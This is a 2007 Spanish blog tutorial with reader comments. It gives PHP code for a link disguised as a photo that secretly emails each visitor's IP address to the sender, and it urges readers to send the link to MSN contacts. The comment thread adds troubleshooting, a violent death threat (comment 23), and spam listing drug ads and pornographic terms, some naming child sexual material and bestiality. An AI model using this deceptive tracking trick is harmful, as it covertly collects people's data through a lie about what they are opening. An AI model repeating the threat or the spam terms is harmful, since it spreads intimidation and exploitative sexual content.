Phishing: Obteniendo la Ip de nuestros amigos del msn.

Posted on February 6th, 2007 in Seguridad, tutoriales by Miggs

Seguramente alguna vez se has necesitado/querido tener acceso a las ip de algunos de tus contactos de Messenger. Hasta ahora, la única manera que, por lo menos yo, conocia para obtenerla era mandándoles un archivo y capturar la ip durante la transmisión. Aunque dicho método funciona, no es demasiado práctico.

Hoy navegando por Internet me he cruzado con Profit42.com. Profit42.com es una especie de blog/comunidad donde entre otros temas hablan de cosas de seguridad y tienen colgados unos cuantos tutoriales. Uno de ellos es sobre el que voy a hablar ahora (Fuente original).

El objetivo consiste en que la victima pulse sobre un link, aparentemente inofensivo, que automáticamente nos mandara un email su ip. Realmente, dicho link no es mas que una pequeña pagina en php, que automáticamente envía un mail con la ip de todo aquel que acceda a el. El unico requesito es tener acceso a un dominio con soporte para php.

Ejemplo:

Creemos una carpeta llamada foto.jpg
En dicha carpeta guardaremos una imagen (http://LoQueSea.com/foto.jpg/foto.jpg) y crearemos un documento “index.php” (http://LoQueSea.com/foto.jpg/index.php) con el siguiente codigo:

<?PHP
$remote_addr = getenv(’REMOTE_ADDR’);
$toaddress = “tuMail@mail.com”; // tu email!
$subject = “Asunto”; // asunto del email
$message = ” IP: $remote_addr”; // Cuerpo del mail
$fromname = “CapturaIp”; // Quien lo envía
$fromaddress = “loQueTeDeLaGana@LoQueSea.com”; // Email de quien lo envía
$headers = “MIME-Version: 1.0\n”;
$headers .= “Content-type: text/plain; charset=iso-8859-1\n”;
$headers .= “X-Priority: 3\n”;
$headers .= “X-MSMail-Priority: Normal\n”;
$headers .= “X-Mailer: php\n”;
$headers .= “From: \”".$fromname.”\” <”.$fromaddress.”>\n”;
mail($toaddress, $subject, $message, $headers);
?>
<img xsrc=”foto.jpg”>

Cuando alguien acceda a Index.php:

  1. Mandara la ip a tuMail@mail.com
  2. Mostrara foto.jpg

Aqui un ejemplo del resultado: http://icaix.com/gracioso.jpg
Descargatelo desde Aqui

Como ejecutar el ataque?

Simplemente mándales a tus amigos un link a http://dominoConSoportePhp.com/foto.jpg y listo, recibirás un mail segundos mas tarde con su ip.

28 Responses to 'Phishing: Obteniendo la Ip de nuestros amigos del msn.'

  1. Toteno said, on February 8th, 2007 at 12:57 pm

    De todo este post sobran todas las referencias a “amigo”
    Alguien al que le interese mi IP sin que yo lo sepa y me ponga una trampa para conseguirla, no es un amigo, es un HIJO DE PUTA.

  2. Miggs said, on February 8th, 2007 at 1:13 pm

    no se tu…, pero yo varia veces son ya las que me he tenido que conectar a los ordenadores de mis amigos via ssh para lo que fuera (véase instalación y configuración de aplicaciones) y este truco la verdad es que ahorra bastante tiempo.

    Además…, lo que me llamo la atención es la originalidad del método…

  3. yomimmo said, on February 9th, 2007 at 11:44 am

    Pues en menéame te están poniendo de capullo para arriba juasssss

    Por cierto, aprende a escribir, juanker.

  4. jiemna said, on May 9th, 2007 at 5:45 pm

    hola disculpen quisiera saber como hackearle la cuenta a un amigo quiero obetener sus mails y toda la informacion que reciba ayudenme sip gracias

  5. Miggs said, on May 11th, 2007 at 2:50 am

    Jiemma, gracias por leer el post, pero lo que pides es claramente ilegal. Es este blog no encontraras ese tipo de ayuda.

    Un suludo

    Miggs

  6. RodriX said, on May 14th, 2007 at 7:03 pm

    Mira yo lo ago y no me sale como hay que hacerlo bien es que mira yo me meto en eso que dice abrir y lo guardo luego me lo mando a mi mismo para ver si funciona y no no sirve no me llega el mensaje ese de los IP que quiero ver

  7. OxidByte said, on May 23rd, 2007 at 2:07 pm

    Me hace gracia lo simple que es pero jamás se me habría ocurrido… xD

  8. elpeor said, on July 3rd, 2007 at 9:06 pm

    si es tu “amigo”, solo debes decirle que entre en la web whatismyip.com y que te mande los 4 números que aparecen.
    Si no es tu amigo, no se que conio hace en tu lista del msn…

  9. Fishxl said, on July 17th, 2007 at 5:28 pm

    xD, muy bueno

  10. hackang01 said, on August 8th, 2007 at 7:33 am

    no me funciona

  11. Dante [alias=>MuS] said, on September 7th, 2007 at 10:02 pm

    Mira, si usas un poco la cabeza no tenes que haces todo ese laburo, yo baje un programa llamado Msn Checker, lo ejecute y si estas en ciber scanea y te tira todas las IP del anillo de conección pero si estas en tu casa te tira la IP con quien estas hablando al toque igual en un ciber invade una PC que elijas y ves con quien habla y dicen y lo mismo funciona en tu PC.

  12. GoldenYandrak said, on October 16th, 2007 at 7:06 pm

    Olaaa

    Necesito saber la IP d alguien….pero nuse muy bien kmo acer el link ste…xD

    Necestio ayuda, vamos.
    M e perdido en lo dl dominio con soporte para PHP k nuse lo k es ni kmo konseguirlo…xD lo demas lo e entendido…mas o menos, asi que necesito ayuda…nuse dame tu email o algo y ablamos

    Dwww

    graciasss

  13. Juan said, on December 27th, 2007 at 2:33 am

    hola! como ya te dije por correo electrónico tu sitio es EXCELENTE

    me tira el siguiente error

    Parse error: syntax error, unexpected ‘@’ in /foto.jpg/index.php on line 3

    gracias!

  14. Miggs said, on December 27th, 2007 at 1:04 pm

    Gracias Juan,

    Has puesto correctamente las dobles comillas ” ” entorno a la dirección de mail?

  15. Juan said, on February 6th, 2008 at 2:32 am

    digo esto porque por ahí le sirve a alguien.
    no me funcionó con este sistema, porque tenía que tener configurado un smtp tal vez?
    asi que un amigo me paso una configuración para que en vez de mandar un mail guarde un archivo (además, le agregó para que diga la hora y alguna cosa más de la máquina que entró)

    ahi que crear un archivito llamdo log.txt y dejarlo ahi mismo, con permisos de escritura para terceros y al index.php hay que ponerle tambien permisos de ejecuciòn. Bueno, espero que le sirva a alguien.

  16. Miggs said, on February 6th, 2008 at 9:11 am

    Gracias por el feedback Juan,

    En principio php a través de la función mail se comunica con el servidor de mail, smtp es “solo” un protocolo. Mientras que el servidor de mail (receptor del mail) y el cliente (servicio php en nuestro caso particular) se entiendan no debería de haber ningún problema.

    Con esto no estoy diciendo que el mecanismo no pueda fallar, ya que en tu caso algo debe de estar causando el error, si nos das algo mas de informacion relevante a lo mejor lo podemos arreglar.

    Por otro lado si me mandas tu index.php lo meto en el tutorial.

  17. Juan said, on February 6th, 2008 at 9:56 pm

    jaja
    que tonto
    me olvidé de postear. Ahora no estoy en casa. Más tarde te lo mando. Tambien voy a hacer la prueba con el archivo que posteaste vos para madarme el error exacto que me tira, ya que tuviste razón respecto al primero error que postie. Gracias.

  18. Miggs said, on February 8th, 2008 at 12:54 am

    Espero tu mail pues, esta por el blog pero por si acaso mi mail es mangel12321 at hotmail.com

    Un saludo!

  19. arlyn said, on March 10th, 2008 at 7:26 pm

    yo quisiera aprender a utilizarlo completamente la verdad no se como crear el dominio php me puede alguien ayudar me interesa mucho aprender esta aplicacion

  20. >p3dRø said, on March 10th, 2008 at 8:00 pm

    No entiendo por qué hablas del tema ilegal como si para ti fuera indiferente si solo con ver el nombre de tu articulo ya das a entender muchas cosas de las intenciones que están de por medio … –> Phishing

    Bueno es una una critica, ya que me parece que esto es un tema delicado que siempre debe estar claro :)

    Saludos y felicitaciones por la página y el esfuerzo de poner tu propio servidor web.

    p3dRø

  21. Luiz said, on March 10th, 2008 at 9:30 pm

    Es tan simple, LOL nose como no se me ocurrio antes…

    Pero me quedo con uno de los mensajes de arriba:

    si es tu “amigo”, solo debes decirle que entre en la web whatismyip.com y que te mande los 4 números que aparecen.
    Si no es tu amigo, no se que conio hace en tu lista del msn…

  22. pollo said, on May 15th, 2008 at 1:49 am

    hola oye una pregunta para que sirve conocer la ip de alguien
    disculpa la ignorancia
    gracias

  23. el pija grande said, on December 5th, 2008 at 8:46 am

    dale manga d giles se creen vivos siendo hakers no se dan cuenta q deben ser trribles bobones q se fisuran a un pc! mangas d gilespero cara a cara no enkra ninguno giles les voy a mandar a abrir(abrir=cortarles la panza al medio) todo por creerses vivos giles
    fueron cnmigo no se juega chupapijas d mierdas ya van a ver yo q usteds pongo seguridad en sus casas xq dntro d 1 semana les va a pasar lo peor d su vida o kpas q hasta la muert

  24. ALAN said, on February 24th, 2009 at 12:32 am

    Hola a todos trate con el sistema que dices auqi pero a mi no me funciona tengo el dominio y el hosting que soporta php sigo los pasos al pie de la letra no me como niguna comilla, reviso y hago varias convinaciones de emails por posible problemas con stmp pero utilizo tanto correos comerciales como empresariales y lo mando lo abren y no ms no llega… cual sera el error….. aparte tambien quiero descargar el archivo y la liga da error ….. Espero que puedan corregir el error y exponer sobre las causas del problema !!!! gracias!

  25. durbums said, on April 4th, 2009 at 6:48 am

    хех. удивил

  26. GarykPatton said, on June 16th, 2009 at 8:58 am

    Hello, can you please post some more information on this topic? I would like to read more.

  27. paealos said, on June 28th, 2009 at 1:09 am

    buy kamagra online
    buy levitra online
    buy cialis online
    buy accutane online

  28. paealos said, on July 2nd, 2009 at 9:47 am

    free adult thumbs
    black sex clips
    free porno clips
    dog fucking girls
    nn preteen model
    cameron diaz sex tape
    free pamela tommy video
    anna kournikova sex
    mature women sex video
    hot teen fucking
    18 year old pussy
    nude brazilian girls
    free oral sex videos
    preteen lolita nudes
    free nude asians
    black tits

Post a comment